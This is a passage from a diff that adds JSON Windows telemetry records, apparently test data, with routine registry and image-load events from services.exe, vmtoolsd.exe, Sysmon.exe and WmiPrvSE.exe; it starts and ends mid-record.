"registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 